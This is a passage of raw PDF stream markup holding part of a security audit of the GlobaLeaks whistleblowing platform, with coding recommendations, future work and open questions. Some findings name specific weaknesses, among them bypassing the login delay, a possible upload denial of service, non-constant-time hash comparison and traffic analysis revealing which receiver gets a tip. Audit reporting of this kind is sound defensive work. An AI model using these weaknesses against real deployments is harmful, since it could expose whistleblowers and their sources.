Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 249.0236 cm Q q 1 0 0 1 62.69291 213.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 3.039982 Tw (Random strings are generated from regular expressions. This is error-prone and this level of) Tj T* 0 Tw .484269 Tw (configurability probably isn't necessary, since the user never sees most of these random strings. It's) Tj T* 0 Tw (also hard to audit the reverse regexp code.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 207.0236 cm Q q 1 0 0 1 62.69291 135.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 57 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 62 Tm .92748 Tw 12 TL /F3 10 Tf 0 0 0 rg (from) Tj ( ) Tj (Crypto.Random) Tj ( ) Tj (import) Tj ( ) Tj (random ) Tj /F1 10 Tf (gives the same name to the cryptographic ) Tj /F3 10 Tf (random ) Tj /F1 10 Tf (as) Tj T* 0 Tw .839982 Tw (Python's non-cryptographic one. This is error-prone and inhibits audit verification. For example, if a) Tj T* 0 Tw 3.488555 Tw (later line has ) Tj /F3 10 Tf (import) Tj ( ) Tj (random ) Tj /F1 10 Tf (then the code in the module may have vulnerable entropy) Tj T* 0 Tw 1.112927 Tw (characteristics. An audit may pass one revision of the code, but a later code may silently add this) Tj T* 0 Tw 20.01497 Tw (vulnerability. 
We recommend an explicitly unique name, such as:) Tj T* 0 Tw /F3 10 Tf (from) Tj ( ) Tj (Crypto.Random) Tj ( ) Tj (import) Tj ( ) Tj (random as) Tj ( ) Tj (cryptorandom) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 129.0236 cm Q q 1 0 0 1 62.69291 81.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm .693318 Tw 12 TL /F1 10 Tf 0 0 0 rg (In the case of the previous recommendation, ) Tj /F3 10 Tf (from) Tj ( ) Tj (foo) Tj ( ) Tj (import) Tj ( ) Tj (* ) Tj /F1 10 Tf (can cause the same problem) Tj T* 0 Tw .484269 Tw (as ) Tj /F3 10 Tf (import) Tj ( ) Tj (random) Tj /F1 10 Tf (, if ) Tj /F3 10 Tf (foo ) Tj /F1 10 Tf (happens to import ) Tj /F3 10 Tf (random) Tj /F1 10 Tf (. This pattern occurs in ) Tj /F3 10 Tf (security.py ) Tj /F1 10 Tf (and) Tj T* 0 Tw 3.59748 Tw (elsewhere. We recommend eschewing ) Tj /F3 10 Tf (import) Tj ( ) Tj (*) Tj /F1 10 Tf (; where a shorthand is needed, define an) Tj T* 0 Tw (abbreviation like ) Tj /F3 10 Tf (import) Tj ( ) Tj (foo) Tj ( ) Tj (as) Tj ( ) Tj (F) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 76.86614 cm Q endstream endobj % 'R377': class PDFStream 377 0 obj % page stream << /Length 7250 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 663.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 51 cm q BT 1 0 0 1 0 38 Tm 1.410888 Tw 12 TL /F3 10 Tf 0 0 0 rg (except: ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (except) Tj ( ) Tj (Exception ) Tj /F1 10 Tf (have hard-to-predict effects on execution. They appear over) Tj T* 0 Tw .94686 Tw (100 times in GLBackend, too many to audit well. According to ) Tj /F4 10 Tf (pylint) Tj /F1 10 Tf (, 44 of them \(outside ) Tj /F3 10 Tf (tests/) Tj /F1 10 Tf (\)) Tj T* 0 Tw 1.984983 Tw (might suppress the original exception. 
We did not investigate how these might have been done) Tj T* 0 Tw (differently.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 1.829983 Tw (This pattern may allow vulnerabilities where an attacker discovers a way to trigger an exception) Tj T* 0 Tw 1.80784 Tw (never anticipated by developers or discovered in testing. Even when this doesn't happen due to) Tj T* 0 Tw 1.778651 Tw (malice, it can lead to bugs in production deployments that were never anticipated in testing and) Tj T* 0 Tw (development.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 657.0236 cm Q q 1 0 0 1 62.69291 633.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .343516 Tw 12 TL /F1 10 Tf 0 0 0 rg (Salts are generated by running ) Tj /F3 10 Tf (SHA512 ) Tj /F1 10 Tf (on a random string. There is less possibility for error if they) Tj T* 0 Tw (are generated directly.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 627.0236 cm Q q 1 0 0 1 62.69291 579.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 1.608555 Tw 12 TL /F1 10 Tf 0 0 0 rg (JavaScript is easier to audit and debug in strict mode \() Tj /F3 10 Tf ('use strict') Tj /F1 10 Tf (\) and when ) Tj /F4 10 Tf (JSHint) Tj /F1 10 Tf (-clean.) Tj T* 0 Tw .715777 Tw /F3 10 Tf (jshint ) Tj /F1 10 Tf (on GLClient reports 162 of what it calls errors: using ) Tj /F3 10 Tf (== ) Tj /F1 10 Tf (instead of ) Tj /F3 10 Tf (===) Tj /F1 10 Tf (, and so on. It can) Tj T* 0 Tw .089461 Tw (be run with a config file to tailor what it deems worth reporting \(and we used a quick-and-dirty one for) Tj T* 0 Tw (our test\).) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 573.0236 cm Q q 1 0 0 1 62.69291 513.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 6.034976 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (globaleaks/handlers/files.py ) Tj /F1 10 Tf (the file download count is checked with ) Tj /F3 10 Tf (== ) Tj /F1 10 Tf (in) Tj T* 0 Tw 1.665814 Tw /F3 10 Tf (download_file ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (download_all_files) Tj /F1 10 Tf (. It would be better to use ) Tj /F3 10 Tf (>) Tj (= ) Tj /F1 10 Tf (for the comparison,) Tj T* 0 Tw .870574 Tw (since it doesn't fail when a race condition or logic error somewhere else makes it one greater than) Tj T* 0 Tw .65528 Tw (the limit. Note: It may be possible to increase the count over the limit by downloading the collection) Tj T* 0 Tw (\(all files\) when it is at the limit.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 507.0236 cm Q q 1 0 0 1 62.69291 385.8419 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 106.1817 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 70.1817 cm q BT 1 0 0 1 0 38 Tm 1.728651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Assume all variables are malicious. Escape everything even if you know it's a constant string or) Tj T* 0 Tw 8.19152 Tw (doesn't contain special characters. An example of where this is not done is in) Tj T* 0 Tw .246905 Tw /F3 10 Tf (globaleaks/utils/utility.py) Tj /F1 10 Tf (. Here, ) Tj /F3 10 Tf (timeStr ) Tj /F1 10 Tf (is assumed to be safe \(and it may be\), but it's) Tj T* 0 Tw (good to get in the habit of escaping everything.) 
Tj T* ET Q Q q 1 0 0 1 23 64.1817 cm Q q 1 0 0 1 23 39 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q q .999274 0 0 .999274 0 0 cm q 1 0 0 1 6.6 6.604796 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 426 24 re B* Q q BT 1 0 0 1 0 2 Tm 12 TL /F3 10 Tf 0 0 0 rg (util) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (untilConcludes) Tj (\() Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (write) Tj (,) Tj ( ) Tj (timeStr) Tj ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg (" ") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj (sanitize_str) Tj (\() Tj (msgStr) Tj (\)\)) Tj T* ET Q Q Q Q Q q Q Q q 1 0 0 1 23 39 cm Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .629987 Tw (Escaping should be done "on the way out" in a specific context instead of "on the way in", because) Tj T* 0 Tw .795542 Tw (you can't encode a value "ahead of time" unless you understand all contexts it will be used in, and) Tj T* 0 Tw (they all have consistent escaping rules.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 379.8419 cm Q q 1 0 0 1 62.69291 355.8419 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .558735 Tw (The client receives from the server an absolute time for session expiry, then checks against its own) Tj T* 0 Tw (clock. If a time interval is desired \("expire in 30 minutes"\), an interval should be sent.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 349.8419 cm Q q 1 0 0 1 62.69291 276.6419 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 58.2 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 58.2 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (It's error-prone to check for enumerations in this style:) Tj T* ET Q Q q 1 0 0 1 23 52.2 cm Q q 1 0 0 1 23 27 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 425.6898 24 re B* Q q BT 1 0 0 1 0 2 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (status) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj (ReceiverFile) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (_status_list) Tj ([) Tj .4 .4 .4 rg (2) Tj 0 0 0 rg (]:) Tj ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# 'encrypted') Tj T* ET Q Q Q Q Q q Q Q q 1 0 0 1 23 27 cm Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .994983 Tw (where the comment serves as the enumeration name. The numbers and comments can easily get) Tj T* 0 Tw (out of sync.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 276.6419 cm Q q 1 0 0 1 62.69291 276.6419 cm Q endstream endobj % 'R378': class PDFStream 378 0 obj % page stream << /Length 8287 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Future Work) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Online Guessing Attacks) Tj T* ET Q Q q 1 0 0 1 62.69291 660.0236 cm q BT 1 0 0 1 0 38 Tm .489213 Tw 12 TL /F1 10 Tf 0 0 0 rg (The problem of remediating ) Tj 0 0 .501961 rg (Issue E. Parallel Requests Bypass Exponentially Increasing Login Delay ) Tj 0 0 0 rg (has) Tj T* 0 Tw .399488 Tw (been left as future work. 
We suggest exploring a defense that forces the client to solve a proof of work to) Tj T* 0 Tw 1.77881 Tw (limit the rate that they can make requests. There are several design alternatives, such as the use of) Tj T* 0 Tw 0 0 .501961 rg (CAPTCHAs) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 630.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Side-Channel Attacks) Tj T* ET Q Q q 1 0 0 1 62.69291 576.0236 cm q BT 1 0 0 1 0 38 Tm .809983 Tw 12 TL /F1 10 Tf 0 0 0 rg (We did not evaluate the full impact of side-channel attacks on ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (. Some possible side-channel) Tj T* 0 Tw 2.240697 Tw (issues are documented in ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* 0 Tw .722765 Tw (Attacks) Tj 0 0 0 rg (. However, we did not spend much time on this, so we feel that ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (could benefit from a) Tj T* 0 Tw (more focused effort on finding side-channel attacks.) Tj T* ET Q Q q 1 0 0 1 62.69291 546.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Eliminating Threads) Tj T* ET Q Q q 1 0 0 1 62.69291 504.0236 cm q BT 1 0 0 1 0 26 Tm .134983 Tw 12 TL /F1 10 Tf 0 0 0 rg (As discussed in ) Tj 0 0 .501961 rg (Recommendations) Tj 0 0 0 rg (, a code organization without threads sharing state by default would be) Tj T* 0 Tw 1.324983 Tw (safer. Work under this heading includes more thorough auditing of the thread-using code and deciding) Tj T* 0 Tw (how to minimize or eliminate it.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 474.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Open Questions & Concerns) Tj T* ET Q Q q 1 0 0 1 62.69291 462.0236 cm Q q 1 0 0 1 62.69291 462.0236 cm Q q 1 0 0 1 62.69291 438.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .669318 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (process may be swapped to disk. This may leak encryption keys and plaintext Tip) Tj T* 0 Tw (contents to the swap file, which could be recovered by forensic analysis of the disk.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 432.0236 cm Q q 1 0 0 1 62.69291 396.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.50784 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (backend is written in Python, which, as a garbage collected language, does not) Tj T* 0 Tw .993555 Tw (make it easy to wipe variables that contained sensitive information. Could the plaintext contents of) Tj T* 0 Tw (submitted files \(and other secrets\) persist in memory long after they were supposed to be discarded?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 390.0236 cm Q q 1 0 0 1 62.69291 342.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 2.471976 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (dump_file_fs\(\) ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (globaleaks/handlers/files.py ) Tj /F1 10 Tf (the first call to ) Tj /F3 10 Tf (read\(\) ) Tj /F1 10 Tf (has no) Tj T* 0 Tw .362339 Tw (argument, meaning it will read the whole file into memory. 
\(A comment indicates a 4kb chunk as the) Tj T* 0 Tw 1.521098 Tw (intention.\) A large file upload could cause DoS. We tried this and got "File is too large" from the) Tj T* 0 Tw (client, but we see nothing stopping an attack independent of the browser.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 336.0236 cm Q q 1 0 0 1 62.69291 300.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.537633 Tw 12 TL /F1 10 Tf 0 0 0 rg (The logging mechanism is vulnerable in the ) Tj /F4 10 Tf (info ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (debug ) Tj /F1 10 Tf (levels. We did not have time to fully) Tj T* 0 Tw 1.707674 Tw (analyze whether it is vulnerable in the ) Tj /F3 10 Tf (CRITICAL ) Tj /F1 10 Tf (level. The current sanitization of ) Tj /F3 10 Tf (log.err\(\)) Tj T* 0 Tw /F1 10 Tf (seems safe, though overcomplicated. ) Tj /F3 10 Tf (log.msg ) Tj /F1 10 Tf (may be vulnerable, but we are unsure.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 294.0236 cm Q q 1 0 0 1 62.69291 270.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .589398 Tw (We did not investigate whether the backend might be vulnerable if its clock could be made to jump.) Tj T* 0 Tw (This might allow an attacker to use a session past its expiration date.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 264.0236 cm Q q 1 0 0 1 62.69291 204.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 1.395433 Tw 12 TL /F1 10 Tf 0 0 0 rg (We did not systematically check use of ) Tj /F3 10 Tf (@unauthenticated ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (@authenticated ) Tj /F1 10 Tf (for excess) Tj T* 0 Tw 2.693307 Tw (permissions. 
\(There are also similarly-named methods in ) Tj /F3 10 Tf (handlers/base.py ) Tj /F1 10 Tf (bearing neither) Tj T* 0 Tw .095318 Tw (decorator. Maybe they're not actual handlers?\) The default behavior of a handler with no decorator is) Tj T* 0 Tw 2.056651 Tw (almost the same as ) Tj /F3 10 Tf (@unauthenticated ) Tj /F1 10 Tf (\(by a reading of the source code\); this is an unsafe) Tj T* 0 Tw (default.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 198.0236 cm Q q 1 0 0 1 62.69291 150.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm .10561 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj 0 0 .501961 rg (GlobaLeaks ticket 672) Tj 0 0 0 rg (, client-side PGP encryption is ruled out because it would tell receiver A that) Tj T* 0 Tw 2.113314 Tw (receiver B also received the file. Doesn't the comments/messaging feature leak that information) Tj T* 0 Tw .444692 Tw (anyway? Is there a way to encrypt a PGP message to multiple recipients so that the recipients can't) Tj T* 0 Tw (tell who the other recipients are?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 150.0236 cm Q q 1 0 0 1 62.69291 144.0236 cm Q q 1 0 0 1 62.69291 144.0236 cm Q q 1 0 0 1 62.69291 120.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .558651 Tw 12 TL /F1 10 Tf 0 0 0 rg (If receivers are assumed to be adversarial in the threat model, what stops them from impersonating) Tj T* 0 Tw (each other on the page where the whistleblower selects the receiver?) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 114.0236 cm Q q 1 0 0 1 62.69291 102.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (What happens when a whistleblower cancels a file upload while it's in progress?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 96.02362 cm Q endstream endobj % 'R379': class PDFStream 379 0 obj % page stream << /Length 11098 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .394269 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (files.py) Tj /F1 10 Tf (, a 26-character random string called ) Tj /F3 10 Tf (saved_name ) Tj /F1 10 Tf (is generated, which is used as the) Tj T* 0 Tw .211235 Tw (destination file name. If there is a collision \(very unlikely, even with birthday\), it could corrupt another) Tj T* 0 Tw (Tip's file.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 723.0236 cm Q q 1 0 0 1 62.69291 687.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.129988 Tw 12 TL /F1 10 Tf 0 0 0 rg (We did not verify if Issue G is exploitable after the ) Tj /F3 10 Tf (URL) Tj /F1 10 Tf (-decode bug is fixed. This can be done by) Tj T* 0 Tw 1.652976 Tw (having the server properly ) Tj /F3 10 Tf (URL) Tj /F1 10 Tf (-decode the ) Tj /F3 10 Tf (Content-Disposition ) Tj /F1 10 Tf (header sent by JavaScript,) Tj T* 0 Tw (then re-evaluating the impact of the vulnerability.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 681.0236 cm Q q 1 0 0 1 62.69291 633.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL .621751 Tw (One purpose of the SHA256 hash \(See Issue B\) is so that the whistleblower can verify their upload) Tj T* 0 Tw 1.761647 Tw (was successful. We suggested remediating Issue B by removing the SHA256 feature altogether.) Tj T* 0 Tw 1.27436 Tw (This removes the whistleblower's ability to verify the upload, which is a lesser problem. It may be) Tj T* 0 Tw (possible to preserve this feature using a keyed HMAC, but we did not explore this possibility.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 627.0236 cm Q q 1 0 0 1 62.69291 603.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.138443 Tw 12 TL /F1 10 Tf 0 0 0 rg (Addressing ) Tj /F4 10 Tf (pylint) Tj /F1 10 Tf ('s reported 44 cases of swallowed exceptions could uncover problems or at least) Tj T* 0 Tw (make their absence clearer.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 597.0236 cm Q q 1 0 0 1 62.69291 561.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .178443 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (get_expirations\(\) ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (security.py ) Tj /F1 10 Tf (it generates a temporary file by putting a random 16-bit) Tj T* 0 Tw .927209 Tw (number in the path. It does not check if the file already exists, so collisions are possible here. The) Tj T* 0 Tw (same thing is done elsewhere in the file, but it raises an exception if the file exists.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 555.0236 cm Q q 1 0 0 1 62.69291 543.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Password hashes are not compared in constant time. See line 95 of ) Tj /F3 10 Tf (security.py) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 537.0236 cm Q q 1 0 0 1 62.69291 501.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.670651 Tw 12 TL /F1 10 Tf 0 0 0 rg (By observing traffic \(especially the notification feature\), you may be able to tell which receiver is) Tj T* 0 Tw .408935 Tw (getting the Tip, which can leak info about its contents \(e.g. if there is one journalist to handle all and) Tj T* 0 Tw (only ) Tj /F4 10 Tf (National Security Agency ) Tj /F1 10 Tf (stories\).) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 495.0236 cm Q q 1 0 0 1 62.69291 483.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (has a unique query pattern, which might make traffic analysis easier.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 477.0236 cm Q q 1 0 0 1 62.69291 441.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .197045 Tw 12 TL /F1 10 Tf 0 0 0 rg (You can add regular links to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (pages. 
